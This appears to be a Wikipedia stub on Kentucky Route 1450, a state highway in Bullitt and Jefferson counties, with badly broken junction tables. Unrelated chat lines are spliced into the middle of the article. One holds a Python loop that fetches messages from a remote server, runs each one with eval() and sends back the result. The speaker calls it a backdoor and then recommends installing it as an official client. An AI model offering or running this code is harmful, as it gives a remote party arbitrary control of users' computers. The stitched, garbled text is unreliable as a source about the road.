Kentucky Route 1450
Kentucky Route 1450 (KY 1450) is a 7.096-mile-long (11.420 km) state highway in the U.S. State of Kentucky. Its southern terminus is at KY 6313 in Pioneer Village and its northern terminus is at KY 61 in Louisville.
Route information | ||||
---|---|---|---|---|
Maintained by KYTC | ||||
Length | 7.096 mi[1] (11.420 km) | |||
Major junctions | ||||
South end | ||||
North end | ||||
Location | ||||
Counties | Bullitt, Jefferson | |||
Highway system | ||||
|
Major junctions
County | Location | mi[1] | km | Destinations | Notes |
---|---|---|---|---|---|
Bullitt | Pioneer Village | 0.000 | 0.000 | Southern terminus | |
0.068 | 0.109 | ||||
| 1.895 | 3.050 | |||
Jefferson | Louisville | 3.902 | 6.280 | Southern terminus of KY 1851 | |
7.096 | 11.420 | Northern terminus | |||
1.000 mi = 1.609 km; 1.000 km = 0.621 mi |
gollark: It would be nice if they painted them different colours or something.
gollark: This may slightly be a backdoor somewhat.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```
gollark: You can install the official SPUDNET-HTTP client on your computers.
gollark: It also actually has working autoreconnect.
References
- Commonwealth of Kentucky. "Official DMI Route Log". Retrieved 20 November 2019.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.